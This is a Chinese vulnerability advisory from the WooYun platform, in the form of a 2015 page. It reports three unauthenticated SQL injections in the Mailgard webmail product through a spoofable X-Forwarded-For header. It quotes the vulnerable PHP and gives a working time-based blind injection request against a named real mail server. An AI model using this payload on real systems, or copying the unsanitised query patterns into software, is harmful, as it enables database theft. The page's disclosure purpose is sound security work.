当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104763

漏洞标题: 佑友mailgard webmail SQL注射无需登录 三处

相关厂商:深圳市河辰通讯技术有限公司

漏洞作者: 路人甲

提交时间:2015-03-31 16:27

修复时间:2015-07-03 18:44

公开时间:2015-07-03 18:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-31: 细节已通知厂商并且等待厂商处理中
2015-04-04: 厂商已经确认,细节仅向厂商公开
2015-04-07: 细节向第三方安全合作伙伴开放
2015-05-29: 细节向核心白帽子及相关领域专家公开
2015-06-08: 细节向普通白帽子公开
2015-06-18: 细节向实习白帽子公开
2015-07-03: 细节向公众公开

简要描述:

某邮件系统 无需登录 三处

详细说明:

mailgard webmail:
register.php:

if($_SERVER['REQUEST_METHOD'] == 'POST'){
$realip = getIP();
$users_id = strtolower($_POST['users_id']);
$email_suffix = strtolower($_POST['email_suffix']);
$username = $users_id."@".$email_suffix;
$users_truename = $_POST['users_truename'];
$users_pass = $_POST['users_pass'];
$pass_strength = $_POST['pass_strength'];
$company = $_POST['company'];
$department = $_POST['department'];
$tel = $_POST['tel'];
$apptime = time();

require_once HM_ROOT.'./class/HicomMd5.class.php';
$hicommd5 = new HicomMd5;
$users_pass = $hicommd5->md5crypt($users_pass);

$sql = "INSERT INTO `register` (`username`,`uid`,`domain`,`password`,`pass_strength`,`truename`,`company`,`department`,`tel`,`ip`,`apptime`) VALUES ('$username','$users_id','$email_suffix','$users_pass','$pass_strength','$users_truename','$company','$department','$tel','$realip','$apptime')";
if($result = $db->query($sql)) {
$alt_str = $language['register_success'];
}else{
$alt_str = $language['register_fail'];
}
}


$realip = getIP():

function getIP()
{
static $realip;
if (isset($_SERVER)){
if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])){
$realip = $_SERVER["HTTP_X_FORWARDED_FOR"];
} else if (isset($_SERVER["HTTP_CLIENT_IP"])) {
$realip = $_SERVER["HTTP_CLIENT_IP"];
} else {
$realip = $_SERVER["REMOTE_ADDR"];
}
} else {
if (getenv("HTTP_X_FORWARDED_FOR")){
$realip = getenv("HTTP_X_FORWARDED_FOR");
} else if (getenv("HTTP_CLIENT_IP")) {
$realip = getenv("HTTP_CLIENT_IP");
} else {
$realip = getenv("REMOTE_ADDR");
}
}
return $realip;
}


测试:
POST /register.php HTTP/1.1
Host: mail.iconergy.com:889
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://mail.iconergy.com:889/register.php
Cookie: PHPSESSID=7l7vsdp8r82enfq8016fh2adk7; _HICOM[LANGUAGE]=zh-cn
X-Forwarded-For: 8.8.8.8',if(ascii(substr(version(),1,1))=53,sleep(5),1))#
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 182
isGo=&users_id=test123&email_suffix=iconergy.com&users_pass=test123test123&pass_strength=2&users_pass2=test123test123&users_truename=test123&company=test123&department=23&tel=test123
可以根据select 猜测全站信息
使用到ip的还有这几个文件:
sso.php:

$_SESSION['_HM_S'] = array();
}else {
session_register('_HM_S');
}
$realip = getIP();
if($act == 'update'){
$db->query('UPDATE `ssomanage` SET `mail_account`="'.$accounts.'",`pwd`="'.encrypt($password,'fabb14acf4f01ed797e523d03288302').'",`ip`="'.$realip.'",`date`="'.time().'" WHERE `other_sys`="'.$user.'"');
}else{
$db->query('INSERT INTO `ssomanage` (`mail_account`,`pwd`,`other_sys`,`i


login.php:

}
if(session_is_registered('_HM_S')) {
$_SESSION['_HM_S'] = array();
}else {
session_register('_HM_S');
}
$realip = getIP();
$db->query("UPDATE `hicom_activeusers` SET `login_date`=NOW(),`ip`='".$realip."',`sess_id`='".session_id()."' WHERE `username`='$accounts'");
$_SESSION['_HM_S']['USERNAME'] = $username;


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-04-04 18:42

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报。

最新状态:

暂无